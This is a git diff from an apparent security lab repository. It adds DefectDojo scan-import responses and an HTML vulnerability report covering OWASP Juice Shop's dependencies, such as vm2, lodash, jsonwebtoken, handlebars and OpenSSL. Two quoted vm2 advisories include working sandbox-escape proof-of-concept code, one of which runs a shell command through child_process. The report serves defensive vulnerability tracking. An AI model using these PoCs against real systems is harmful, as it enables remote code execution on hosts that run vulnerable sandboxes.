diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md
new file mode 100644
index 00000000..b65a6540
--- /dev/null
+++ b/.github/pull_request_template.md
@@ -0,0 +1,9 @@
+# Goal
+Submitting my homework for lab#
+
+# Changes
+- Added submissionXX.md
+
+# Checklist
+- [x] Task 1 done
+- [x] Task 2 done
\ No newline at end of file
diff --git a/labs/assets/imported.png b/labs/assets/imported.png
new file mode 100644
index 00000000..ce9b46eb
Binary files /dev/null and b/labs/assets/imported.png differ
diff --git a/labs/lab10/imports/import-semgrep-results.json.json b/labs/lab10/imports/import-semgrep-results.json.json
new file mode 100644
index 00000000..8cf08366
--- /dev/null
+++ b/labs/lab10/imports/import-semgrep-results.json.json
@@ -0,0 +1 @@
+{"minimum_severity":"Info","active":false,"verified":false,"endpoint_to_add":null,"product_type_name":"Engineering","product_name":"Juice Shop","engagement_name":"Labs Security Testing","auto_create_context":true,"deduplication_on_engagement":false,"lead":null,"push_to_jira":false,"api_scan_configuration":null,"create_finding_groups_for_all_findings":true,"test_id":2,"engagement_id":1,"product_id":1,"product_type_id":2,"statistics":{"after":{"info":{"active":0,"verified":0,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":0},"low":{"active":0,"verified":0,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":0},"medium":{"active":18,"verified":0,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":18},"high":{"active":8,"verified":0,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":8},"critical":{"active":0,"verified":0,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":0},"total":{"active":26,"verified":0,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":26}}},"pro":["Did you know, Pro has an automated no-code connector for Semgrep JSON Report? Try today for free or email us at hello@defectdojo.com"],"apply_tags_to_findings":false,"apply_tags_to_endpoints":false,"scan_type":"Semgrep JSON Report","close_old_findings":false,"close_old_findings_product_scope":false,"test":2}
\ No newline at end of file
diff --git a/labs/lab10/imports/import-trivy-vuln-detailed.json.json b/labs/lab10/imports/import-trivy-vuln-detailed.json.json
new file mode 100644
index 00000000..d0d1d3f0
--- /dev/null
+++ b/labs/lab10/imports/import-trivy-vuln-detailed.json.json
@@ -0,0 +1 @@
+{"minimum_severity":"Info","active":false,"verified":false,"endpoint_to_add":null,"product_type_name":"Engineering","product_name":"Juice Shop","engagement_name":"Labs Security Testing","auto_create_context":true,"deduplication_on_engagement":false,"lead":null,"push_to_jira":false,"api_scan_configuration":null,"create_finding_groups_for_all_findings":true,"test_id":3,"engagement_id":1,"product_id":1,"product_type_id":2,"statistics":{"after":{"info":{"active":0,"verified":0,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":0},"low":{"active":21,"verified":21,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":21},"medium":{"active":69,"verified":67,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":69},"high":{"active":107,"verified":105,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":107},"critical":{"active":22,"verified":22,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":22},"total":{"active":219,"verified":215,"duplicate":0,"false_p":0,"out_of_scope":0,"is_mitigated":0,"risk_accepted":0,"total":219}}},"apply_tags_to_findings":false,"apply_tags_to_endpoints":false,"scan_type":"Trivy Scan","close_old_findings":false,"close_old_findings_product_scope":false,"test":3}
\ No newline at end of file
diff --git a/labs/lab10/imports/import-zap-report-noauth.json.json b/labs/lab10/imports/import-zap-report-noauth.json.json
new file mode 100644
index 00000000..207345f6
--- /dev/null
+++ b/labs/lab10/imports/import-zap-report-noauth.json.json
@@ -0,0 +1 @@
+{"message":"['Internal error: Wrong file format, please use xml.']","pro":["Pro comes with support. Try today for free or email us at hello@defectdojo.com"]}
\ No newline at end of file
diff --git a/labs/lab10/imports/run-imports.sh b/labs/lab10/imports/run-imports.sh
old mode 100644
new mode 100755
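Review bot: The ZAP import response committed here records a failed import, not a successful one — its whole body is `{"message":"['Internal error: Wrong file format, please use xml.']",...}` with no `test`, `statistics` or finding counts — so the DAST results never reached DefectDojo and the generated report will silently lack them. The fix is upstream of this file: export the ZAP report in the XML format the error message asks for, and have whatever produced these captures (presumably `run-imports.sh`, which this commit only makes executable) treat a non-2xx or `message`-only response as a failure instead of saving it alongside the successful Semgrep and Trivy responses. All three captures also carry a doubled `.json.json` suffix (`import-semgrep-results.json.json`, `import-trivy-vuln-detailed.json.json`, `import-zap-report-noauth.json.json`), which looks like `.json` appended to a name that already had it.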
diff --git a/labs/lab10/report/dojo-report.html b/labs/lab10/report/dojo-report.html new file mode 100644 index 00000000..4d0c20fa --- /dev/null +++ b/labs/lab10/report/dojo-report.html @@ -0,0 +1,44916 @@ + + + + + Finding Report + + + + + + + + + + + +
+ + + +
+
+ +

Findings

+ + + +

Critical

+ +
+
+
+
+ Finding 126: GHSA-5mrr-rgp6-x4gr Marsdb 0.6.11 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
marsdb0.6.11
+ + + + + + + +
File Path
juice-shop/node_modules/marsdb/package.json
+
+
+
+ + + + + +
Description
+

Command Injection in marsdb
+Target: Node.js
+Type: node-pkg
+Fixed version:

+

All versions of marsdb are vulnerable to Command Injection. In the DocumentMatcher class, selectors on $where + clauses are passed to a Function constructor unsanitized. This allows +attackers to run arbitrary commands in the system when the function is +executed.

+

Recommendation

+

No fix is currently available. Consider using an alternative package until a fix is made available.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://github.com/bkimminich/juice-shop/issues/1173
+https://www.npmjs.com/advisories/1122

+ + + + + + + +
+
+
+
+ Finding 117: CVE-2019-10744 Lodash 2.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash2.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

+ + +
Description
+

nodejs-lodash: prototype pollution in defaultsDeep function leading to modifying properties
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.17.12

+

Versions of lodash lower than 4.17.12 are vulnerable to Prototype +Pollution. The function defaultsDeep could be tricked into adding or +modifying properties of Object.prototype using a constructor payload.

+ + +
Mitigation
+

4.17.12

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2019:3024
+https://access.redhat.com/security/cve/CVE-2019-10744
+https://github.com/advisories/GHSA-jf85-cpcp-j695
+https://github.com/lodash/lodash/pull/4336
+https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2019-10744.yml
+https://nvd.nist.gov/vuln/detail/CVE-2019-10744
+https://security.netapp.com/advisory/ntap-20191004-0005
+https://security.netapp.com/advisory/ntap-20191004-0005/
+https://snyk.io/vuln/SNYK-JS-LODASH-450202
+https://support.f5.com/csp/article/K47105354
+https://support.f5.com/csp/article/K47105354?utm_source=f5support&amp%3Butm_medium=RSS
+https://support.f5.com/csp/article/K47105354?utm_source=f5support&utm_medium=RSS
+https://www.cve.org/CVERecord?id=CVE-2019-10744
+https://www.npmjs.com/advisories/1065
+https://www.oracle.com/security-alerts/cpujan2021.html
+https://www.oracle.com/security-alerts/cpuoct2020.html

+ + + + + + + +
+
+
+
+ Finding 110: CVE-2015-9235 Jsonwebtoken 0.4.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 20 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.4.0
+ + + + + + + +
File Path
juice-shop/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

nodejs-jsonwebtoken: verification step bypass with an altered token
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.2.2

+

In jsonwebtoken node module before 4.2.2 it is possible for an +attacker to bypass verification when a token digitally signed with an +asymmetric key (RS/ES family) of algorithms but instead the attacker +send a token digitally signed with a symmetric algorithm (HS* family).

+ + +
Mitigation
+

4.2.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2015-9235
+https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries
+https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/
+https://github.com/advisories/GHSA-c7hr-j4mj-j2w6
+https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687
+https://nodesecurity.io/advisories/17
+https://nvd.nist.gov/vuln/detail/CVE-2015-9235
+https://www.cve.org/CVERecord?id=CVE-2015-9235
+https://www.npmjs.com/advisories/17
+https://www.timmclean.net/2015/02/25/jwt-alg-none.html

+ + + + + + + +
+
+
+
+ Finding 105: CVE-2015-9235 Jsonwebtoken 0.1.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 20 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.1.0
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

nodejs-jsonwebtoken: verification step bypass with an altered token
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.2.2

+

In jsonwebtoken node module before 4.2.2 it is possible for an +attacker to bypass verification when a token digitally signed with an +asymmetric key (RS/ES family) of algorithms but instead the attacker +send a token digitally signed with a symmetric algorithm (HS* family).

+ + +
Mitigation
+

4.2.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2015-9235
+https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries
+https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/
+https://github.com/advisories/GHSA-c7hr-j4mj-j2w6
+https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687
+https://nodesecurity.io/advisories/17
+https://nvd.nist.gov/vuln/detail/CVE-2015-9235
+https://www.cve.org/CVERecord?id=CVE-2015-9235
+https://www.npmjs.com/advisories/17
+https://www.timmclean.net/2015/02/25/jwt-alg-none.html

+ + + + + + + +
+
+
+
+ Finding 93: CVE-2026-33937 Handlebars 4.7.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
handlebars4.7.7
+ + + + + + + +
File Path
juice-shop/node_modules/handlebars/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

handlebars.js: Handlebars: Remote Code Execution via crafted Abstract Syntax Tree object in compile()
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.7.9

+

Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, Handlebars.compile() accepts a pre-parsed AST object in addition to a template string. The value field of a NumberLiteral + AST node is emitted directly into the generated JavaScript without +quoting or sanitization. An attacker who can supply a crafted AST to compile() + can therefore inject and execute arbitrary JavaScript, leading to +Remote Code Execution on the server. Version 4.7.9 fixes the issue. Some + workarounds are available. Validate input type before calling Handlebars.compile(); ensure the argument is always a string, never a plain object or JSON-deserialized value. Use the Handlebars runtime-only build (handlebars/runtime) on the server if templates are pre-compiled at build time; compile() will be unavailable.

+ + +
Mitigation
+

4.7.9

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33937
+https://github.com/handlebars-lang/handlebars.js
+https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2
+https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
+https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2w6w-674q-4c4q
+https://nvd.nist.gov/vuln/detail/CVE-2026-33937
+https://www.cve.org/CVERecord?id=CVE-2026-33937

+ + + + + + + +
+
+
+
+ Finding 230: CVE-2026-44006 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

+ + +
Description
+

vm2 has a Sandbox Escape Vulnerability
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

Summary

+

It is possible to reach BaseHandler.getPrototypeOf, which can be used to get arbitrary prototypes

+

Details

+

https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658

+

BaseHandler can be reached via util.inspect (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8)

+

PoC

+
let obj = {
+    subarray: Buffer.prototype.inspect,
+    slice: Buffer.prototype.slice,
+    hexSlice: () => '',
+};
+
+let sym;
+
+obj.slice(10, {
+    showHidden: true,
+    showProxy: true,
+    depth: 10,
+    stylize(a) {
+        const handler = this.seen && this.seen[1];
+
+        if (handler && handler.getPrototypeOf) {
+            gP = handler.getPrototypeOf;
+            HObjectProto = gP(gP(gP(gP(Buffer))));
+            HObject = HObjectProto.constructor;
+            sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
+        }
+        return a;
+    },
+});
+
+obj = {
+    [sym]: (depth, opt, inspect) => {
+        inspect.constructor('return process')()
+        .getBuiltinModule('child_process')
+        .execSync('id', { stdio: 'inherit' });
+    },
+    valueOf: undefined,
+    constructor: undefined,
+};
+
+WebAssembly.compileStreaming(obj).catch(() => {});
+
+ +

Impact

+

Sandbox Escape -> RCE

+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-qcp4-v2jj-fjx8

+ + + + + + + +
+
+
+
+ Finding 229: CVE-2026-44005 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H

+ + +
Description
+

vm2: Mutable Proxies for Host Intrinsic Prototypes Allows Sandbox Escape
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

Summary

+

vm2's bridge exposes mutable proxies for real host-realm intrinsic +prototypes and then forwards sandbox writes into the underlying host +objects with otherReflectSet() and otherReflectDefineProperty(), which +lets attacker-controlled JavaScript running in a default VM or inherited + NodeVM mutate shared host Object.prototype, Array.prototype, and +Function.prototype from inside the sandbox.

+

Details

+

BaseHandler.apply() unwraps sandbox-controlled receivers and +arguments with otherFromThis() / otherFromThisArguments() and then +directly invokes the real host function with ret = +otherReflectApply(object, context, args), so any default-exposed host +function that can surface a prototype getter becomes a prototype-walking + primitive (lib/bridge.js:665-676). BaseHandler.get() special-cases proto and returns the host-side descriptor or proxy target prototype, which is enough for the attacker to reuse the host lookupGetter('proto') accessor repeatedly until the walk lands on host Object.prototype, Array.prototype, or Function.prototype (lib/bridge.js:590-616). + Once the attacker has a proxy to a host intrinsic prototype, +BaseHandler.set() performs value = otherFromThis(value); return +otherReflectSet(object, key, value) === true;, which writes +attacker-controlled data directly into the shared host object instead of + keeping the mutation sandbox-local; BaseHandler.defineProperty() +repeats the same design at otherReflectDefineProperty(object, prop, +otherDesc) for descriptor-based writes (lib/bridge.js:641-649, lib/bridge.js:753-774). + Existing validation does not stop the attack because the constructor +filter only blocks one dangerous-property access pattern, +setPrototypeOf() only blocks prototype replacement rather than ordinary +property assignment, and containsDangerousConstructor() only protects +one later re-unwrapping path instead of the initial host-prototype write + sink (lib/bridge.js:494-530, lib/bridge.js:595-610, lib/bridge.js:660-662).

+

PoC

+

Run the following code snippet and observe that the value of vm2EscapeMarker is polluted:

+
const { VM } = require('vm2');
+const vm = new VM();
+vm.run(`
+  const g = ({}).__lookupGetter__;
+  const a = Buffer.apply;
+  const p = a.apply(g, [Buffer, ['__proto__']]);
+  const hostObjectProto = p.call(p.call(p.call(p.call(Buffer.of()))));
+  hostObjectProto.vm2EscapeMarker = 'polluted-object-prototype';
+`);
+console.log({}.vm2EscapeMarker)
+
+ +

Impact

+

Sandbox escape and prototype pollution.

+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-vwrp-x96c-mhwq

+ + + + + + + +
+
+
+
+ Finding 85: CVE-2023-46233 Crypto-Js 3.3.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 328 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
crypto-js3.3.0
+ + + + + + + +
File Path
juice-shop/node_modules/crypto-js/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

+ + +
Description
+

crypto-js: PBKDF2 1,000 times weaker than specified in 1993 and 1.3M times weaker than current standard
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.2.0

+

crypto-js is a JavaScript library of crypto standards. Prior to +version 4.2.0, crypto-js PBKDF2 is 1,000 times weaker than originally +specified in 1993, and at least 1,300,000 times weaker than current +industry standard. This is because it both defaults to SHA1, a +cryptographic hash algorithm considered insecure since at least 2005, +and defaults to one single iteration, a 'strength' or 'difficulty' value + specified at 1,000 when specified in 1993. PBKDF2 relies on iteration +count as a countermeasure to preimage and collision attacks. If used to +protect passwords, the impact is high. If used to generate signatures, +the impact is high. Version 4.2.0 contains a patch for this issue. As a +workaround, configure crypto-js to use SHA256 with at least 250,000 +iterations.

+ + +
Mitigation
+

4.2.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2023-46233
+https://github.com/brix/crypto-js
+https://github.com/brix/crypto-js/commit/421dd538b2d34e7c24a5b72cc64dc2b9167db40a
+https://github.com/brix/crypto-js/security/advisories/GHSA-xwcq-pm8m-c4vf
+https://lists.debian.org/debian-lts-announce/2023/11/msg00025.html
+https://nvd.nist.gov/vuln/detail/CVE-2023-46233
+https://ubuntu.com/security/notices/USN-6753-1
+https://www.cve.org/CVERecord?id=CVE-2023-46233

+ + + + + + + +
+
+
+
+ Finding 50: CVE-2026-31789 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 787 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

openssl: OpenSSL: Heap buffer overflow on 32-bit systems from large X.509 certificate processing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.19-1~deb12u2

+

Issue summary: Converting an excessively large OCTET STRING value to
+a hexadecimal string leads to a heap buffer overflow on 32 bit platforms.

+

Impact summary: A heap buffer overflow may lead to a crash or possibly
+an attacker controlled code execution or other undefined behavior.

+

If an attacker can supply a crafted X.509 certificate with an excessively
+large OCTET STRING value in extensions such as the Subject Key Identifier
+(SKID) or Authority Key Identifier (AKID) which are being converted to hex,
+the size of the buffer needed for the result is calculated as multiplication
+of the input length by 3. On 32 bit platforms, this multiplication may overflow
+resulting in the allocation of a smaller buffer and a heap buffer overflow.

+

Applications and services that print or log contents of untrusted X.509
+certificates are vulnerable to this issue. As the certificates would have
+to have sizes of over 1 Gigabyte, printing or logging such certificates
+is a fairly unlikely operation and only 32 bit platforms are affected,
+this issue was assigned Low severity.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this
+issue, as the affected code is outside the OpenSSL FIPS module boundary.

+ + +
Mitigation
+

3.0.19-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-31789
+https://github.com/advisories/GHSA-j79m-9jxq-788r
+https://github.com/openssl/openssl/commit/364f095b80601db632b0def6a33316967f863bde
+https://github.com/openssl/openssl/commit/7a9087efd769f362ad9c0e30c7baaa6bbfa65ecf
+https://github.com/openssl/openssl/commit/945b935ac66cc7f1a41f1b849c7c25adb5351f49
+https://github.com/openssl/openssl/commit/a24216018e1ede8ff01a4ff5afff7dfbd443e2f9
+https://github.com/openssl/openssl/commit/a91e537d16d74050dbde50bb0dfb1fe9930f0521
+https://nvd.nist.gov/vuln/detail/CVE-2026-31789
+https://openssl-library.org/news/secadv/20260407.txt
+https://ubuntu.com/security/notices/USN-8155-1
+https://www.cve.org/CVERecord?id=CVE-2026-31789
+https://www.openwall.com/lists/oss-security/2026/04/07/11

+ + + + + + + +
+
+
+
+ Finding 49: CVE-2025-15467 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 787 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

openssl: OpenSSL: Remote code execution or Denial of Service via oversized Initialization Vector in CMS parsing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.18-1~deb12u2

+

Issue summary: Parsing CMS AuthEnvelopedData or EnvelopedData message with
+maliciously crafted AEAD parameters can trigger a stack buffer overflow.

+

Impact summary: A stack buffer overflow may lead to a crash, causing Denial
+of Service, or potentially remote code execution.

+

When parsing CMS (Auth)EnvelopedData structures that use AEAD ciphers such as
+AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is
+copied into a fixed-size stack buffer without verifying that its length fits
+the destination. An attacker can supply a crafted CMS message with an
+oversized IV, causing a stack-based out-of-bounds write before any
+authentication or tag verification occurs.

+

Applications and services that parse untrusted CMS or PKCS#7 content using
+AEAD ciphers (e.g., S/MIME (Auth)EnvelopedData with AES-GCM) are vulnerable.
+Because the overflow occurs prior to authentication, no valid key material
+is required to trigger it. While exploitability to remote code execution
+depends on platform and toolchain mitigations, the stack-based write
+primitive represents a severe risk.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this
+issue, as the CMS implementation is outside the OpenSSL FIPS module
+boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3 and 3.0 are vulnerable to this issue.

+

OpenSSL 1.1.1 and 1.0.2 are not affected by this issue.

+ + +
Mitigation
+

3.0.18-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2026/01/27/10
+http://www.openwall.com/lists/oss-security/2026/02/25/6
+https://access.redhat.com/errata/RHSA-2026:1473
+https://access.redhat.com/security/cve/CVE-2025-15467
+https://bugzilla.redhat.com/2430375
+https://bugzilla.redhat.com/2430376
+https://bugzilla.redhat.com/2430377
+https://bugzilla.redhat.com/2430378
+https://bugzilla.redhat.com/2430379
+https://bugzilla.redhat.com/2430380
+https://bugzilla.redhat.com/2430381
+https://bugzilla.redhat.com/2430386
+https://bugzilla.redhat.com/2430387
+https://bugzilla.redhat.com/2430388
+https://bugzilla.redhat.com/2430389
+https://bugzilla.redhat.com/2430390
+https://bugzilla.redhat.com/show_bug.cgi?id=2430375
+https://bugzilla.redhat.com/show_bug.cgi?id=2430376
+https://bugzilla.redhat.com/show_bug.cgi?id=2430377
+https://bugzilla.redhat.com/show_bug.cgi?id=2430378
+https://bugzilla.redhat.com/show_bug.cgi?id=2430379
+https://bugzilla.redhat.com/show_bug.cgi?id=2430380
+https://bugzilla.redhat.com/show_bug.cgi?id=2430381
+https://bugzilla.redhat.com/show_bug.cgi?id=2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430387
+https://bugzilla.redhat.com/show_bug.cgi?id=2430388
+https://bugzilla.redhat.com/show_bug.cgi?id=2430389
+https://bugzilla.redhat.com/show_bug.cgi?id=2430390
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796
+https://errata.almalinux.org/9/ALSA-2026-1473.html
+https://errata.rockylinux.org/RLSA-2026:1473
+https://github.com/advisories/GHSA-wvhq-3h88-rf6g
+https://github.com/guiimoraes/CVE-2025-15467
+https://github.com/openssl/openssl/commit/2c8f0e5fa9b6ee5508a0349e4572ddb74db5a703
+https://github.com/openssl/openssl/commit/5f26d4202f5b89664c5c3f3c62086276026ba9a9
+https://github.com/openssl/openssl/commit/6ced0fe6b10faa560e410e3ee8d6c82f06c65ea3
